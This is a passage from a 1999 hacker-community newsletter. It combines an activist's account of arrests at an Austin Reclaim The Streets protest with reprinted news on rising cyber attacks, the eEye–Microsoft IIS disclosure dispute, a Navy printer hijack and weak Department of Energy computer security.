showed up. Like a number of urban police forces in the U.S., Austin has its police-on-bicycle contingent, mostly used for patrolling the busy downtown area. The bike cops started to move around the crowd and address people whom they thought might be leaders. I was actually standing with my back turned, talking to a friend, when one bike cop came up to us. Maybe because I was smoking a cigar he thought I was a 'revolutionary leader'. (Just kidding.) Anyway, the bike cop said to us, "I'm contacting my supervisor and if you aren't out of the street in ten minutes, we are going to start making arrests." I told the bike cop that I wasn't in charge. But anyway, my friend and I passed on this warning to a few others. So when the three police vans and the handful of marked and unmarked cars showed up - to inadvertently block the streets themselves - we were not surprised. The three vans barreled down the road from the east and the marked and unmarked cars from the west, stopping right at the intersection of 4th and Lavaca. Obviously, given that there were not many of us and given that we had neither anticipated nor were we prepared to take a stand, we mostly filtered back off the street and onto the side. But there were a few who - for whatever reason - were not so content to give up the street that quickly. Bike cops and regular police officers stood in the street in between the three vans and the rest of us on the side of the road. People were jeering at the cops. I didn't see exactly what happened - or what precipitated it - but in a flash a group of cops lunged forward and pulled someone from out of the crowd on the side, not even someone who was standing closer to the police, but someone behind another. And then another was arrested. And then a third. People were yelling and screaming and the cops: "You fucking pigs!"; "Don't you have any real criminals to arrest"; "Whose street? Our street!" They remained for awhile longer. Tensions quieted down. And the vans and the marked and unmarked cars drove off. All through this, my girlfriend had been trying to call a few local media outlets. She was at the payphone in front of Ruta Maya. At one point she told me she had got through to KXAN. But no media ever showed up. With the police gone, three of us on the way to jail, a number of the riders - who had only wanted to ride their bikes and not get involved with this mess - on their way out, the ones who had planned this Austin Reclaim The Street action bewilderedly consulted about how next to proceed. My girlfriend and I had both been arrested before and were quite familiar with the process. She knew the inside of Austin's jail and something about the procedure for getting out. She offered her advice to the younger activists and was ready to leave them to it. But I suggested maybe we ought to also go down to the police station to help sort things out. So we did. THE POLICE STATION By the time we parked the car and got inside the police station, there was already a crowd of perhaps 20 people, mostly sitting on the floor, inside the area where you ask about new arrestees. It looked like we were now reclaiming the police station, rather than the street! We weren't sure if the two young women and one young man were taken to this station. And there was speculation that they could have taken them to any number of substations throughout the city, as they are sometimes apt to do. None of the people whose idea it was to reclaim the section the street in front of Ruta Maya were prepared for arrests, and in Austin there aren't really known activist lawyers - like in some U.S. cities - readily available to help in moments like this. Although a few of the people who ended up being in the Austin RTS action were seasoned activists, most seemed to be people who had never actually had to deal with police arrests before. Or if they had, they certainly hadn't made any arrangements in advance. So everything was handled on the spot. My girlfriend has a friend who is a lawyer who has helped her out in the past. While she was on the phone to her, others were over at the main desk waiting to hear if in fact the three were at this station and what they were being held for. Finally, at some point between 9:30 and 10:00 we learned that yes in fact the three had been brought to this station, and what the charges were. One was charged with a Class C misdemeanor for refusing to obey the order of a police officer. Another was charged with a Class C misdemeanor for disorderly conduct. But the third was charged with a Class B misdemeanor, a more severe level, for "inciting a riot." First of all, there was no riot, by any stretch of the imagination. But more importantly, the young woman charged with inciting a riot - as I later learned - had merely begun to yell out a cheer. She had said, "Give me a 'P'," - and was probably going to spell "PIG" - at which point the cops lurched forward to grab her from out of the crowd. My girlfriend's friend who is a lawyer advised us that it would be best if a boisterous crowd did not linger in the police station waiting area as it might only antagonize them and encourage them to hold the three longer. So a group drifted off and went to Lovejoys - the bar where we had started the evening off earlier. My girlfriend and I, and a couple of friends of the people being detained, remained at the police station. We learned that the two with Class C misdemeanors would be able to be released for $200 bond, although it wouldn't be until much later in the night, actually the wee hours of the morning, but that the young woman charged with inciting a riot would have to wait until a judge came at 10:30 in the morning. When we saw that it was senseless to wait at the police station any longer, the rest of us left as well, joining others back at Lovejoys where we drank from pitchers of beer, mulled over what had just transpired, and continued an earlier thread about some of the internal dynamic of the new warehouse space in Austin called Pueblos Unidos. THE NEXT MORNING In the middle of the night the two with Class C misdemeanors were bailed out. And at 10:30 or so on June 19, my girlfriend's lawyer friend - a bit begrudgingly - had to go down to the station to deal with the magistrate and help the one with the inciting riot charge get released. My girlfriend went back to the police station in the morning as well - in part to console her lawyer friend who had had to be bothered on a Friday evening she was spending with her husband who works out of town all during the week. She was able to help get the one with the inciting riot charge out of jail, by being able to visit her while in custody and explain the procedure for getting a personal release - but did not agree to be the lawyer for these cases. Compounding factors were that two of the people arrested, including the one with the inciting a riot charge, had just returned to the country - literally on the afternoon of June 18 - after having been in Guatemala and Mexico. Now, a criminal lawyer will need to be found. People will have to spend precious and limited resources on the entire legal process. Those who must return to court will have added stress and worry. And what started out as evening or revelry ends up in the onerous world of the courts. AFTERTHOUGHTS ON THE REAL Several things are clear. While a degree of planning for this action was undertaken - in that minimally a date, time, and place were chosen and the action was given some form and content - there definitely were important elements in the planning process that were overlooked. The first, obviously being that it should have been known by the people whose intent it was to reclaim the street to realize that this sort of activity generally falls outside the boundary of the law, that the police were likely to show up, and that arrests were possible. And that given the possibility of arrest, contingency plans should have been made: i.e. there should have been a lawyer on stand by and even some sort of legal observer. The second oversight was that there was no attention given to drawing in media, nor were any of the participants using any audio or video recording devices. No photographs nor any videotape of the above arrests were made to supply concrete evidence demonstrating that in fact the Class B misdemeanor inciting to riot charge is ludicrous. And finally it seems that the nature and purpose of the action was not made clearly manifest to passersby or to unconnected people sitting inside or outside of Ruta Maya. All of these things - legal preparation, media work, and public relations - are aspects of street actions that are fairly important. And there are clearly people in Austin who have strong skills in all of these areas and whose services could have been called upon. I'm not sure, but I think the Austin RTS action was a last minute one, pulled off by just a few people who didn't have time to do everything needed. I don't want to sound too critical. During the moment - albeit a short one - there was a temporary autonmous zone. People did in fact reclaim a portion of a street. But the cost of doing this is that several people now unwittingly must face the hassle and expense of the court system. HYBRIDITY: THE VIRTUAL AND THE REAL One year ago I wrote a few short pieces with the theme of hybridity, talking about the goal of developing actions that combined on-line (virtual) and off-line (real) elements. In part this was a reaction to criticism the Electronic Disturbance Theater received which claimed that by acting purely in the virtual realm we were isolating ourselves from people who focused more or all of their attention on doing things in the street or in the flesh. We tried to introduce this idea of Electronic Civil Disobedience to the community of activists who every year, for the past few anyway, have gone to the School of the Americas to participate in the more traditional civil disobedience style of action. And at a national conference on civil disobedience held in Washington, DC, this past January, two from the EDT were part of a panel discussion on Electronic Civil Disobedience. Even so, this notion of joint computer-based and street-based actions has a long way to go. There is still a disjuncture, a gap, between what's happening now on the Net and what people are doing on the street. Many people engaged in yesterday's street action in Austin, for example, probably had no idea that the virtual component was even taking place. EDT's participation in the global RTS actions is another step in developing both the theory and practice of this sort of joint engagement. The Internet is inherently global and so Internet-based actions seem to be a logical match with global street actions. But this is not to say that the particular example of FloodNet is the most ideal way of meshing the street and Net together. The FloodNet action is something that individuals may join from their computers at home, work, or in an educational environment. Even though acting simultaneously, jointly, the participants in the on-line and off-line actions in this case may have been completely different sets of people. What can be done differently? Some examples from Amsterdam and London over the course of the last few years are instructive. During demonstrations against a meeting of the EU in Amsterdam - which involved massive police presence in the streets - people created web pages in which they mapped out the location of the police. The pages were constantly updated with relevant information to demonstrators from people sending in email messages or calling in from pay phones or cell phones. In another example, in London during an occupation/takeover of a Shell office, activists used a portable laptop connected to a cell phone to send out announcements to the media and others once they were inside. They were also able to directly update a web site during the occupation. Austin's Reclaim The Street action was about as low tech as you can go. The most sophisticated technology were probably the bicycles used for the first part of the action. Clearly there was no digital technology. No interface with the Net. The closest to this was probably when my girlfriend used the payphone right in front of Ruta Maya to unsuccessfully call media as the police were making arrests. For a moment she tapped in to the telephone infrastructure - which is basically what the Internet is. What would have happened or what could happen in the future if we are able to enhance these sorts of street actions with a real-time audio and video presence? Imagine if on the elevated sidewalk in front of Ruta Maya and out on the street several people had had video cameras and they were taping the entire action. Further imagine that there were cables running from the cameras to the interior of the café where people were sitting with laptop computers capable of handling video input and these laptops were connected to a phone line in the café - a live stream of audio and video being netcast about the RTS action to a global audience. Video recording and netcasting the street action may not have prevented people from being arrested, but it certainly would have captured a public record and people other than the participants and the observers at Ruta Maya would have known about it. As it stands there is no recorded imagery or audio of the Austin RTS action. Nor have there been any reports about it in the local media. Nor does anyone on the Net - apart from those reading this - know about it. One would think that in a town such as Austin - one credited as having one of the fastest growing economies in the U.S. largely linked to the high tech computer industry - that activists here would have the wherewithal to develop these sorts of uses of seemingly readily available digital technology. But there are obstacles. Some of the obstacles are ideological, perhaps. A lingering anti-technology critique. Some of the obstacles are economic. A genuine lack of access. Some obstacles may simply be that the ideas are still new. To conclude - well at least to stop, concluding may be too premature right now - in addition to an obvious need for more attention to some basic legal, media, and publicity training, there is a need to think about and to experiment more with ways of bringing the street and the Net closer together. We should address this question: how do we bring what is happening on the street onto the Net? The Zapatista FloodNet action in conjunction with the global Reclaim The Street actions is an example of real-virtual hybridity at a world-wide level. But it is only one form and it lies within the area of Internet as site for resistance and direct action. Finally, then, it seems there are at least two important areas where further exploration is needed: the first, greater experimentation with other forms of on-line action and electronic civil disobedience to be used jointly with actions on the street; the second, greater experimentation with bringing the street and the Net closer together so that what happens on the street is netcast in real-time onto the Net to a global audience. END @HWA 53.0 Cyber Attacks in Australia Double ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 17th 1999 From HNN http://www.hackernews.com/ contributed by Code Kid The Australian Computer Emergency Response Team (AusCERT) is claiming that cyber attacks in Australia have doubled over the last year. They claim that there has been a sharp rise in DoS attacks and recommend that companies have strong security and policies in place. Sydney Morning Herald http://www.smh.com.au/news/9906/16/text/business4.html Australian Computer Emergency Response Team http://www.auscert.org.au/ Sydney Morning Herald' On guard against hacker attacks Date: 16/06/99 By KIRSTY NEEDHAM The average hacker is no longer a clever but disgruntled techno-geek. Security experts warned yesterday that dangerous programs, ready for download and use against corporate Web sites, were being uncovered by simple keyword searches on the Internet. Hacker attacks in Australia have doubled this year, according to the Australian Computer Emergency Response Team (AusCERT), which has seen around 1,500 incidents. AusCERT is part of an international organisation, CERT, that co-ordinates efforts against Internet security breaches. One of the latest security problems has been a rise in "denial of service" attacks, where a Web site is crippled by a flood of requests for information. "This can be easy to do and there are tools available to would-be hackers," said Mr Eric Halil, AusCERT operations manager. "You don't have to be an expert to use them." Mr Halil said many Web sites were also being "probed" by automated scanning tools. "It is difficult to determine what the motives are. Some people are joy riders - they like to break and enter systems. "Others like breaking into well-known systems like financial institutions. They earn kudos with their peers," he said. A Forum of Incident Response and Security Teams (FIRST) conference in Brisbane this week is being attended by members from the military, business, government and academia in 22 countries. "Incidents tend to be international in nature. Even the local hacker around the corner breaking into a university will break in overseas first to cover the trail," said Mr Byron Collie, an agent with the Australian Federal Police who is on secondment to the Australian defence forces' directorate of information warfare. The FBI estimates that 80 per cent of attacks are made by disgruntled employees, with 20 per cent coming from outside the organisation. However, Mr Collie said this was shifting towards 50 per cent as companies failed to take adequate security measures. "Organisations need to have a security policy in place, including incident response procedures, if they want to conduct e-commerce or have any connectivity to the Internet," said Mr Collie. "Early law enforcement contact and protocols in handling evidence will ensure it is admissible in court. If it is left until the last minute or files have been bandied around in e-mail, it jeopardises prosecutions." Mr Mowgli Assor, a computer security specialist with Ohio State University, said there had been an increase in both hacking incidents and the tools available to attack computer networks. Infoguard, an incident response team set up by the FBI in March, was part of a move by the US Government to raise awareness of computer attacks, Mr Assor said. A reluctance by embarrassed companies to report attacks to the police or FBI had been seen as a problem, he said. "Disgruntled teenagers are growing up and not shedding their ways. Hackers have been becoming smarter and taking more careful approaches. Break-ins are harder to detect and protect against," Mr Assor said. @HWA 54.0 SmartCards Next Stop for Internet Crime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (Next stop? its already happening, see section 20.0 ... -Ed) June 17th 1999 From HNN http://www.hackernews.com/ contributed by chippy The Australian Institute of Criminology has released a report that claims that SmartCards will be the next stop for high-tech criminals. These new crimes will force officials to develop new forensic processes and tool to be able to extract data from such small storage devices. Australian Financial Review http://www.afr.com.au/content/990616/inform/inform2.html Australian Institute of Criminology http://www.aic.gov.au/ Australian Financial Review; Smartcards may be set to revolutionise crime By Helen Meredith Cyber crimebusters warn that smartcards will be the next target for digital law breakers, with the technology lending itself to concealment of data from law enforcement agencies. According to a report released yesterday by the Institute of Criminology, smartcards may have the single greatest impact on the conduct of crime in our society with their ability to store, process and secure significant quantities of data. They are expected to make the job of policing and bringing cyber criminals to book complicated, with experts forced to develop new forensic processes and tools that will enable them to analyse and extract data from digital storage devices such as smartcards. Entitled What is Forensic Computing? the AIC report was released to coincide with the opening of an international conference in Brisbane on the handling of computer security incidents. The Federal Minister for Justice, Senator Amanda Vanstone, speaking during the plenary session of the FIRST Conference, said: "We are used to seeing computer hackers portrayed in the media as youthful idealists who are simply engaging in a bit of mischievous fun." This did not match up with the reality of computer crime, she said. Damaging digital data and communications had the potential to ruin businesses and seriously affect national economic interests, with criminals using digital technology both to commit crimes and hide their activities. Senator Vanstone said a survey of businesses carried out by the Office of Strategic Crime Assessment in the Attorney-General's Department, in conjunction with the Victorian Police and consultant Deloitte Touche Tohmatsu, had shown that about a third of firms in the banking, technology, communications and computer sectors had suffered unauthorised use of their systems in the previous 12 months. The proportion of these attacks originating externally had increased, a trend that was expected to continue. Until recently, most assaults on computer systems had been identified as internal, usually involving disgruntled employees. Authorities were also concerned that about 42 per cent of businesses had not reported such external cyber intrusions. "I doubt very much that two in five businesses would fail to call in the police should the intrusion involve a physical breach of their security, such as a break and enter, even if nothing was taken," she said. The use of high-grade encryption, the loss of the human interface in financial transactions and the lack of a paper trail were serious impediments to law enforcement. AIC director Dr Adam Graycar said investigating sophisticated crimes and assembling the necessary evidence for presentation in a court of law had become a significant issue for police. A new specialist law enforcement field, forensic computing, had arisen as a result. This involved identifying digital evidence and preserving it through the investigation process. @HWA 55.0 Internet Was Designed without Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 17th 1999 From HNN http://www.hackernews.com/ contributed by Weld Pond Why are viruses and 'evil hackers' seemingly running rampant all over the internet? Because in the beginning it was designed that way. Take a romp through the early formative years of the net, all in six or seven paragraphs. Washington Post http://www.washingtonpost.com/wp-srv/WPlate/1999-06/15/150l-061599-idx.html Vipers In the Sandbox Used to Be, the Internet Was a Safe Place to Play By John Schwartz Washington Post Staff Writer Tuesday, June 15, 1999; Page C01 Why are the newspapers full of reports of hackers defacing government Web sites and nasty viruses wreaking havoc on computers around the world? In no small part it is a cultural problem that goes back to the '60s origins of personal computing and the Internet. Many of the Internet pioneers were bearded longhairs, academics and engineers whose techno-hippie ethos suffused their new world. They knew each other, were part of a community. Trust was the rule. The early Internet was much more about openness and communication than walls and locks. The faults it was supposed to correct were in the machines, not in us: corrupted packets, not corrupted morals. "Once upon a time there was the time of innocence," says Clifford Stoll, whose work tracking down European hackers became a popular book, "The Cuckoo's Egg." "Once upon a time computers were not used except in academia, where there really is nothing that's mission-critical. Once upon a time computers were mainly play toys for the techno-weirds--techie play toys." In that environment, hacking was part of the fun of what Stoll has called the early Internet "sandbox." "In that environment, there seems to be a cachet of 'Hey! I wrote a virus! Hee-ho!' In that environment, it seems funny to break into somebody else's computer. . . . It seems somewhat innocent to read somebody else's e-mail." It started with hacking telephone systems. The founders of Apple Computer--Steve Jobs and Steve Wozniak--got their start in business peddling "blue boxes"--little devices that allowed users to hack the telephone network and make long-distance calls for free. These "phone phreaks" were seen by some as cultural heroes--free spirits striking a blow against the suits, the evil corporations seen as the enemies of spontaneity and creativity. Once computer systems were connected by networks, "remote hacking was an attractive challenge," Internet pioneer Vinton Cerf recalls via e-mail. "Surreptitiously making your way into the operating system from your secret hideout. . . . Much of the motivation was like picking locks or scaling walls--just to see if you could do it. Harm was not the objective, most of the time." Katie Hafner, who has written books about the history of the Internet and about the lives of hackers, says that this metaphor of nerds at play is compelling--and accurate. "It was a big open playscape for these guys," she says. "The Net was built as a completely open community. People would actually be offended if files were protected." To be sure, there were some early nods to security issues--the fledgling ARPANET, the precursor to today's Internet, required passwords. It was funded by the military, after all. However, "the subtext was this was an open community because this was an experiment," Hafner says. It was built by guys like Jon Postel, the Internet pioneer who died last year. Postel had a vision of an Internet that didn't need a center to survive, a network that could be governed by standards and consensus without ever putting anybody in charge. Utopian? Sure. Vulnerable? Uh-huh. That culture rejected attempts to create computer operating systems that incorporated security from the ground up, but were complex and cumbersome. Computer security expert Peter Neumann says: "Viruses exist only because of the shortsightedness of subsequent developers who almost completely ignored the security problems" that some designers had effectively solved. The problem is that the Net caught on, and in the biggest possible way. The anarchic, antiauthoritarian, don't-tell-us-how-to-run-our-lives ethic that defined the burgeoning network--and is still held out by most of the experts as the source of its vitality and strength--has retained that early vulnerability. Broader penetration of the Internet into society meant broader penetration of society into the Internet; it became more like the real world, and the real world is a tough place. In '60s terms, the idea of free spirits being outside the control of central authority was the best of all possible worlds. But with no one in charge, it was damnedly hard to plug security holes. A big wake-up call came in 1988 when Robert T. Morris Jr., then a student at Cornell University, released a computer program that single-handedly crashed systems across the Internet. His father, a famous programmer and security expert, was of the generation that had hacked for fun. Morris Jr. didn't mean to bring down the Net. "His mischief was kind of in the spirit of the Net," says Hafner. But by then the Internet was no longer a playscape, and the damage was real. Of course if the Net's problem is anarchy, the problem with personal computers is monarchy: Bill Gates. Microsoft "is indeed the evil empire when it comes to robust infrastructures," says Neumann. Two viruses that recently swept through the world's computers, Melissa and Explore.zip, took advantage of the fact that so many millions of PCs run on a suite of Microsoft's programs. The company's latest offerings include security options--but the options are turned off at the factory. The security measures make computing a little clunkier, and cut users off from some of the bells and whistles that Microsoft writes into its programs. Says computer security expert Eugene Spafford of Purdue University, it's as if consumers "said they wanted faster cars," and so the vendors maximize speed by providing "faster cars, but with no brakes and no air bags!" Release a virus that attacks that company's software specifically, and "it's analogous to the Spaniards bringing smallpox to the Incas," he says. "There was no immunity--they just wiped everybody out. . . . We've really set up our environment in an unsafe way." Of course today's Internet is a mirror of society. It may have been conceived in a spirit of trust and information wanting to be free and good practical jokes. But today it's about--money. The frontier is getting settled by corporations worth billions, all of which are promising to sell us our future. They have to deliver, so anti-virus programmers and network security consultants have a market opportunity. It's a tough time for a system that was created in an age of innocence. It will be interesting to see if a network strong enough to survive nuclear attack can survive its own success. © Copyright 1999 The Washington Post Company @HWA 56.0 Original Apple I On the Auction Block ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 17th 1999 From HNN http://www.hackernews.com/ contributed by Cuda What is being called the first Apple I ever sold will soon be sold via auction. The Auctioneers are expecting bids to go well over $40,000. One of of approximately 200 that where ever built this one includes original documentation including the original 8-page manual. The auction company will accept absentee bids online. Better hurry. The live bidding starts on Tuesday June 29, at 11 a.m La Salle Auctions http://www.lasallegallery.com/framemac.htm @HWA 57.0 Microsoft Calls eEye Irresponsible ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 18th 1999 From HNN http://www.hackernews.com/ contributed by Weld Pond A week after notifying Microsoft of a major hole in its Internet Information Server 4.0 eEye Digital Security Team went public with the information and published an exploit for the hole. The Microsoft spin machine labeled this action as 'Irresponsible'. The finger here should not be pointed at eEye who did the honorable thing by alerting the public and posting a real fix before Microsoft, but should instead be pointed at Microsoft for creating bad software, and even worse, concealing the information for up to a week. Unfortunately these articles don't seem understand that. LA Times http://www.latimes.com/HOME/BUSINESS/t000054445.html Nando Times http://www.techserver.com/story/body/0,1634,61071-97188-693078-0,00.html The UK Register http://www.theregister.co.uk/990618-000010.html Associated Press - Via San Jose Mecury News http://www.mercurycenter.com/breaking/docs/078774.htm InfoWorld http://www.infoworld.com/cgi-bin/displayStory.pl?990617.hneeye.htm eEye Digital Security Team http://www.eeye.com/ Microsoft http://www.microsoft.com/security/bulletins/ms99-019.asp Late Update Well, at least Forbes gets it. Forbes http://www.forbes.com/tool/html/99/Jun/0618/mu5.htm Forbes; Microsoft's security secret By Benjamin Polen EW YORK. 12:45PM EDT—Microsoft’s (nasdaq: MSFT) failure to immediately alert customers of a serious security flaw in its Internet Information Server (IIS) could hurt the company’s image and cost it customers as the software giant tries to establish a position within the competitive marketplace of mission-critical server applications. Microsoft knew about the vulnerability for a week but tried to delay telling customers until it could prepare a software patch. But Microsoft’s efforts to suppress notification of the IIS bug ultimately backfired and proved embarrassing when eEye, a privately held network security company, took the information to the public on Tuesday. eEye detected the bug during a beta test of a security program and alerted Microsoft of the problem on June 8. The vulnerability is so severe that anyone with modest programming skills and an Internet connection can gain complete control over a web server running IIS, which runs on 22.3% of the web servers on the Internet, according to research firm Netcraft. Despite the severity of the problem, Microsoft stopped responding to eEye's E-mails after June 11, according to Firas Bushnaq, CEO of eEye. After several days, eEye decided to post an advisory on its web site on Tuesday. The CERT Coordination Center, a federally funded computer security research institute at Carnegie-Mellon University, posted an advisory on the following day, lending credence to eEye's concerns. Firas Bushnaq said his company acted because Microsoft was "not taking the vulnerability seriously." When Microsoft still had not publicly acknowledged the vulnerability six hours after eEye posted the advisory, the security company went a step further and published source code that could be used against the IIS bug. "When it was at that level, we decided we had to release the exploit, we would definitely get more attention," said Bushnaq. For its part, Microsoft was not pleased with eEye’s decision to issue an advisory, much less any source code that could be used against their product. Microsoft deems eEye’s full disclosure decision as "irresponsible" and "beyond comprehension," according to Jason Garms, Microsoft’s lead product manager for Windows NT security. The disagreement between Microsoft and eEye highlights a burgeoning culture clash in the computer world where traditional corporate secrecy collides with the free-information ethos of the Net. On its web site, eEye explained why it felt justified in posting the advisory and the source code. "Our responsibility to our clients and the whole network community is to disclose as many details as possible.… This is the way we can contribute to the security community and keep software vendors working hard at producing more robust products." For its part, Microsoft hoped that by keeping knowledge of the vulnerability secret, it could protect its customers until a patch had been developed and tested. "Frankly, the feedback from customers is that they don’t want us to go and publicize our bugs before we have fixes for our problems," Garns said. But at least one industry analyst questions Microsoft’s handling of the situation. "If you want your customers to depend on your products for mission-critical applications, then you have to avoid at all costs any kind of behavior that suggests you’re not to be trusted and you’re not dependable," said Eric Hemmendinger, a senior analyst at the Aberdeen Group. "Having a problem occur is one thing. But not acknowledging it is another issue altogether. For that people should hold them accountable." Hemmendinger compared Microsoft’s attitude toward corporate information technology managers with that of a rude guest. "It’s like an immature person being invited to the party and not behaving responsibly. This is not the kind of behavior that gets you invited back to the party," he said. The situation could come back to haunt Microsoft as it tries to attract new corporate customers. "If you are considering using IIS and you become aware of things like this in Microsoft's behavior you got to take this into consideration," Hemmendinger said. "If they really want to be accepted in the data center this is not the right behavior." -=- UK register; Posted 18/06/99 12:33pm by John Lettice Major MS Web Server security hole exposed, plugged Security outfit eEye has roused Microsoft's ire and garnered itself some cheap publicity by going public with information on what it says is a serious security flaw in Microsoft's Internet Information Server (IIS) 4.0. The move hasn't helped the company's relationship with Microsoft any, but it seems to have triggered the appearance of a swift patch, full fix to follow. According to eEye the flaw allows arbitrary code to be run on any web server running IIS 4.0, and by using a buffer overflow bug in the software attackers can remotely execute code to enable access to all data on the server." So it's a serious one, although Microsoft says it hasn't had any reports of the security hole being used so far. eEye accuses Microsoft of failing to give the problem the attention it deserved. The company claims to have hassled MS for days, but "after the fifth day of reporting the bug to Microsoft, they stopped responding to our emails." So the company went public with the problem three days later, as an attempt to force Microsoft's hand. Microsoft swiftly posted a patch, but accuses eEye of irresponsibility in publicising a problem before a fix had been found. There's some justification in that, but there's also some in the view that being able to announce "we've found a hole, but we fixed it" is better than having to confirm "Yike, there's a huge security hole in our product." ® @HWA 58.0 Has the FBI Overreacted? ~~~~~~~~~~~~~~~~~~~~~~~~ June 18th 1999 From HNN http://www.hackernews.com/ contributed by Weld Pond Scott Peterson has some interesting commentary about the recent crackdown of the FBI on web graffiti artists. The government has compared recent cracks to the use of terrorist weapons such as chemical and biological weapons. Mr. Peterson says it is nothing of the sort and that the recent crackdown fosters images of McCarthyism. Definitely some interesting viewpoints here and worth the time to read. PC Week http://www.zdnet.com/pcweek/stories/news/0,4153,406619,00.html ** Sorry the ZDNet nazis have cut and paste prevention in their html code so I couldn't reprint the article here.(And you can't either for personal record wtf kind of lame action is that?). the reason I do reprint the articles is because often times (see previous section links for examples) the stories are unavailable or pay only for archives, if anyone knows how to thwart ZDNet's (or anyone elses) anti cut and paste tactics email me hwa@press.usmc.net! and no view source doesn't work either ... 59.0 Printer at Spa War Compromised ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 18th 1999 From HNN http://www.hackernews.com/ contributed by Silicosis Ron Broersma, from the Space and Naval Systems Warfare Center, has claimed that Russians where able to redirect print jobs destined for a local printer back to Russia. While such a hack is possible in theory the difficulties of doing so would make it seem unlikely. DNS cache corruption seems like the most likely scenario. It is too bad that Mr. Broersma did not respond to the authors of this article with confirmation. CMP Net http://www.techweb.com/wire/story/TWB19990617S0007 Russians Hack U.S. Printer (06/17/99, 10:56 a.m. ET) By Lee Bruno and Robin Gareiss, Data Communications Welcome back, Cold War. It looks as though the Russians might be up to their old tricks, if the infiltration of the network at the Space and Naval Systems Warfare Center (Spa War) in San Diego, Calif., is any indication. The incursion was discovered by Ron Broersma, a Spa War networkoperations engineer, when a local network print job took an unusually long time. Monitoring tools revealed a file had been hijacked from the printing queue, sent to a server in Russia, and finally back to the Spa War printer. Broersma concluded the network intruder had hacked into the printer, and reconfigured routing tables on equipment elsewhere on the Spa War network to ship the file to Russia. Broersma relayed his account of the network printer hack at a recent meeting of the North American Network Operators' Group. He said he secured Spa War's printers after the attack by resetting router filters, and by eliminating older printers that, he said, are especially vulnerable. "It turned out to be a real tough problem for us," he said. Broersma has not returned subsequent phone calls for further comment, however. It's also not known who the Russian server belonged to, or what information was compromised. Networked printers are known to be especially vulnerable to hacking attacks. They have their own IP addresses, and they run various standard protocols that can be exploited. To make matters worse, printer vendors haven't added any strong security features to their products that would protect them against break-ins. @HWA 60.0 Popular Singapore Sites Defaced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 18th 1999 From HNN http://www.hackernews.com/ contributed by lamer Two high profile sites in Singapore where recently defaced. MediaCity and Television Corporation Of Singapore. Unfortunately no mirrors of either site are available. The Electric New Paper http://newpaper.asia1.com.sg/spore/nplo05.html (link dead) @HWA 61.0 DOD Says its CRAP! (Mustn't be Scottish) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 18th 1999 From HNN http://www.hackernews.com/ DOD Labels Software as 'Crap' contributed by Code Kid Art Money, senior civilian IT official for the Defense Department, while speaking at at the GovTechNet International Conference in Washington, D.C, said "The quality of software we're getting from vendors today is crap, vendors are not building quality in." Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0614/web-crap-6-17-99.html JUNE 17, 1999 . . . 15:17 EDT Contractors' software 'crap,' says top DOD IT official BY BOB BREWIN (antenna@fcw.com) The Pentagon's top information technology official sharply criticized, in the plainest possible language, the quality of software that IT contractors currently supply to the Defense Department. "The quality of software we're getting from vendors today is crap," said Art Money, senior civilian official, who is acting as assistant secretary of Defense for command, control, communications and intelligence. "Vendors are not building quality in," Money said today at the GovTechNet International Conference in Washington, D.C. "We're finding holes in it." DOD buys hundreds of millions of dollars worth of software each year, including everything from shrink-wrapped packages designed to run on the desktop to customized systems running millions of lines of code. The quality of much of the software that DOD is receiving is so poor, Money said, that he is worried about the future of the U.S. software industry. Money predicted that if the U.S. software industry does not get its act together, it could suffer the same fate as the U.S. automobile manufacturing industry, with software sales moving offshore to Japan, for example. @HWA 62.0 DOE Still Unsecure ~~~~~~~~~~~~~~~~~~~ June 18th 1999 From HNN http://www.hackernews.com/ contributed by Space Rogue Even after one of the worst cases of spying in US history a special investigative report has found that the Department of Energy is not taking computer security seriously. The report labels computer security practices at DOE as "naive at best and dangerously irresponsible at worst." Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0614/web-report-6-16-99.html Science at its Best, Security at its Worst - DOE Security Report http://jya.com/pfiab-doe.htm Federal Computer Week; JUNE 16, 1999 . . . 17:24 EDT Cybersecurity holes persist at DOE labs, study finds BY DANIEL VERTON (dan_verton@fcw.com) Despite what may be the worst spy case in U.S. history involving nuclear weapon design data, the computer networks at the nation's five weapons laboratories continue to be "riddled with vulnerabilities," according to a report by a special investigative panel of intelligence and security officials. According to the report, "Science at its Best, Security at its Worst," issued this month by the President's Foreign Intelligence Advisory Board, midlevel managers throughout the Energy Department have responded to the recent Chinese spy scandal with a "business as usual" attitude, while foreign nationals residing in "sensitive countries" continue to have unmonitored remote dial-up access to lab networks. The three-month study uncovered recurring problems with DOE's computer security program, including poor labeling and tracking of computer media, problems with lax password enforcement on laboratory computer workstations and a significant failure to control access to sensitive and classified networks. Computer security methods throughout DOE over the last two decades have been "naive at best and dangerously irresponsible at worst," the report said. In fact, "computer systems at some DOE facilities were so easy to access that even department analysts likened them to 'automatic teller machines,' [allowing] unauthorized withdrawals at our nation's expense," the report said. Security audits also uncovered what the report calls "remarkable" lapses in addressing security problems and procedural gaps at many DOE labs. According to the report, it took DOE 31 months to write and approve a network security plan, 24 months to order security labels for mislabeled software, 20 months to ensure that improperly stored classified computer media had been safeguarded and 51 months to properly safeguard cryptographic material used to secure telephones. It even took 11 months to remove a deceased employee from classified document access lists, according to the report. The report also outlined instances of classified information being placed on unclassified networks well after the department had developed a corrective action plan in July 1998. "The predominant attitude toward security and counterintelligence among many DOE and lab managers has ranged from half-hearted, grudging accommodation to smug disregard," the report concluded. -=- ** A few diagrams were omitted from this report go to the url at jya fo see the report with diagrams (they're most useful NOT)... - Ed 24 June 1999: Revise links to PFIAB report at the White House. 23 June 1999: Link to DOE Secretary Richardson's June 22 Senate testimony. 22 June 1999: Add notice on Senate joint hearings. [Congressional Record: June 21, 1999 (Digest)] From the Congressional Record Online via GPO Access [wais.access.gpo.gov] Monday, June 21, 1999 Daily Digest Senate COMMITTEE MEETINGS FOR TUESDAY, JUNE 22, 1999 (Committee meetings are open unless otherwise indicated) Senate Committee on Armed Services: with the Select Committee on Intelligence, and with the Committee on Energy and Natural Resources, and with the Committee on Governmental Affairs, to hold joint hearings on the President's Foreign 